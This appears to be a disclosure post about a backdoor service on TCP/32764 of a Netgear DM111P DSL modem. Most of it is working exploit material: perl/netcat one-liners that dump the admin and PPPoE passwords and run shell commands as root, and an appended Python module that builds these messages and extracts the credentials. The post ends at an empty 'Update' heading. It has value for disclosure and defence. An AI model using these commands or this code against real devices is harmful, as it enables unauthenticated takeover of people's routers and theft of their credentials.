Netgear DM111P backdoor?

After reading @elvanderb’s tweet about a backdoor in his Linksys WAG200G, I checked my Netgear DM111P DSL modem (running firmware V2.00.27_WW) and found that TCP/32764 was open and responding in a similar way.

The admin’s HTTP password is also exposed in clear text through the scfgmgr process listening on TCP/32764. A request is a 12-byte header of three little-endian 32-bit integers (the magic 0x53634d4d, which appears as the bytes "MMcS" on the wire, a message code, and the payload length), followed by the payload; the reply to message code 1 is the whole nvram as NUL-separated key=value records, hence the perl -0 in the pipeline:

$ perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 192.168.0.1 32764 \
| perl -n0e 'chomp;print"$_\n"' \
| grep ^http_

Output:

http_username=admin
http_password=***password*in*clear***
http_timeout=5

More important is the ability to execute arbitrary shell commands as root (with a code 7 message). The payload is the command line, and the length field must match it:

$ perl -e '$c="ps";print pack("(III)<", 0x53634d4d, 0x07, length($c)).$c' \
| nc 192.168.0.1 32764
MMcS?  PID  Uid        VSZ Stat Command
    1 root       1268 S   init       
    2 root            SW  [keventd]
    3 root            RWN [ksoftirqd_CPU0]
    4 root            SW  [kswapd]
    5 root            SW  [bdflush]
    6 root            SW  [kupdated]
    7 root            SW  [swapper]
    8 root            SW  [mtdblockd]
   55 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   56 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   57 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
   65 root        628 S   /sbin/klogd 
  125 root       1148 S   dnrd -a 192.168.0.1 -m hosts -c off --timeout=0 -b 
  130 root        620 S   /usr/sbin/crond 
  131 root        652 S   /sbin/syslogd -f /etc/syslog.conf 
  133 root        868 S   /usr/sbin/scfgmgr 
  135 root        600 S   /usr/sbin/atm_monitor init 
  141 root       1184 S   /usr/sbin/dsl_cpe_control -f /firmware/modemhwe.bin -
  142 root        596 S   /usr/sbin/cmd_agent_ap 
  143 root        596 S   /usr/sbin/pb_ap 
  137 root            SW  [autbtex]
  138 root            SW  [atm_led_complet]
  139 root            SW  [pmex_ne]
  140 root            SW  [pmex_fe]
  163 root       1268 S   init       
  165 root        672 S   /usr/sbin/mini_httpd -d /www -r NETGEAR DM111P  ADSL2
  228 root        612 S   /sbin/br2684ctld 
  755 root        996 S   /usr/sbin/scfgmgr 
  756 root       1268 S   sh -c ps 
  757 root       1272 R   ps

Further inspection:

List of message codes for the DM111P:

  • 1: Get all nvram variables (open/lseek/read on /tmp/nvram)(contains PPPoE passwords, HTTP admin password, etc.)
  • 2: Get a specific nvram variable (nvram_get)
  • 3: Set a specific nvram variable (parse string with strtok and call nvram_set)
  • 4: Commit nvram variables (nvram_commit)
  • 5: Reset WAN mode ? (nvram_set wan_mode=bridge, wan_encap=0, wan_vpi=8, wan_vci=81, and finally /usr/sbin/rc wan restart&)
  • 6: Get ADSL (up|down)stream speed %dKbps/%dKbps (fopen/fscanf on /tmp/adsl/downstream and /tmp/adsl/upstream/)
  • 7: Execute arbitrary commands through popen!!!
  • 8: Write content to /tmp/%s file
  • 9: Get version from /etc/version
  • 10: Get nvram value of variable lan_ipaddr
  • 11: Restore default nvram variables (nvram_set restore_default=1)
  • 12: fopen/fseek/fread on /dev/mtdblock/5?
  • 13: nvram_load followed by nvram_commit?
  • 14: Set firmware BOOT options? (execute /usr/sbin/fw_env %s %s through a system call)
  • 20: Get WAN interface MAC address? (nvram_get wan_macaddr_def)
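The following Python is an added example, not code from the original post: it encodes the 12-byte request header used by the perl one-liners above, parses the NUL-separated nvram dump returned by message code 1, and builds the code 7 command message. The message code constants come from the list above. One assumption not stated on the page: the reply is parsed as carrying the same header layout as the request (magic, code, length), which only extends what is visible here, namely that replies start with "MMcS". The sample reply is constructed, not captured from a device, and `probe()` is network code that is not exercised offline.

```python
import socket
import struct
from typing import Dict, Optional, Tuple

# Request header as sent by the perl one-liners: little-endian uint32 magic
# 0x53634d4d ("MMcS" on the wire), message code, payload length.
MAGIC = 0x53634D4D
HEADER = struct.Struct("<III")

# Message codes as enumerated for the DM111P above.
MSG_NVRAM_DUMP = 1
MSG_NVRAM_GET = 2
MSG_NVRAM_SET = 3
MSG_NVRAM_COMMIT = 4
MSG_EXEC = 7
MSG_GET_VERSION = 9


def build_msg(code: int, payload: bytes = b"") -> bytes:
    """Encode one scfgmgr request: header followed by the raw payload."""
    return HEADER.pack(MAGIC, code, len(payload)) + payload


def build_exec(cmd: str) -> bytes:
    """Code 7: the payload is the shell command line handed to popen()."""
    return build_msg(MSG_EXEC, cmd.encode())


def parse_reply(data: bytes) -> Optional[Tuple[int, bytes]]:
    """Split a reply into (return code, payload).

    Assumption (not stated on the page): the reply header mirrors the request
    header, magic / return code / payload length. The page only shows that
    replies begin with the bytes "MMcS".
    """
    if len(data) < HEADER.size:
        return None
    magic, code, length = HEADER.unpack_from(data)
    if magic != MAGIC:
        return None
    return code, data[HEADER.size:HEADER.size + length]


def parse_nvram_dump(payload: bytes) -> Dict[str, str]:
    """Code 1 payload: NUL-separated "key=value" records (the reason the
    one-liner above reads records with perl -0)."""
    out: Dict[str, str] = {}
    for rec in payload.split(b"\0"):
        if b"=" in rec:
            key, _, value = rec.partition(b"=")
            out[key.decode(errors="replace")] = value.decode(errors="replace")
    return out


def exposed_secrets(nvram: Dict[str, str]) -> Dict[str, str]:
    """Pick out the credentials a code 1 dump leaks (HTTP admin, PPPoE)."""
    return {k: v for k, v in nvram.items()
            if k.startswith("http_") or k.startswith("pppoe") or "passw" in k.lower()}


def probe(host: str, port: int = 32764, timeout: float = 3.0) -> bool:
    """Send a code 1 request and report whether the reply looks like scfgmgr.
    Only run this against a device you own; not exercised offline."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(build_msg(MSG_NVRAM_DUMP))
            head = s.recv(HEADER.size)
    except OSError:
        return False
    return head[:4] == b"MMcS"


# Constructed sample reply modelled on the output shown above (not captured
# from a real modem): header plus three NUL-terminated nvram records.
SAMPLE_PAYLOAD = b"http_username=admin\0http_password=s3cret\0http_timeout=5\0"
SAMPLE_REPLY = HEADER.pack(MAGIC, 0, len(SAMPLE_PAYLOAD)) + SAMPLE_PAYLOAD

if __name__ == "__main__":
    print(build_msg(MSG_NVRAM_DUMP).hex())   # 4d4d6353 01000000 00000000
    print(build_exec("ps"))
    parsed = parse_reply(SAMPLE_REPLY)
    if parsed is not None:
        print(exposed_secrets(parse_nvram_dump(parsed[1])))
```

Note that `build_msg` derives the length field from the payload, which is the detail the code 7 one-liner handles with `length($c)`; a mismatched length is the usual reason a hand-built message gets no answer.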

Update:
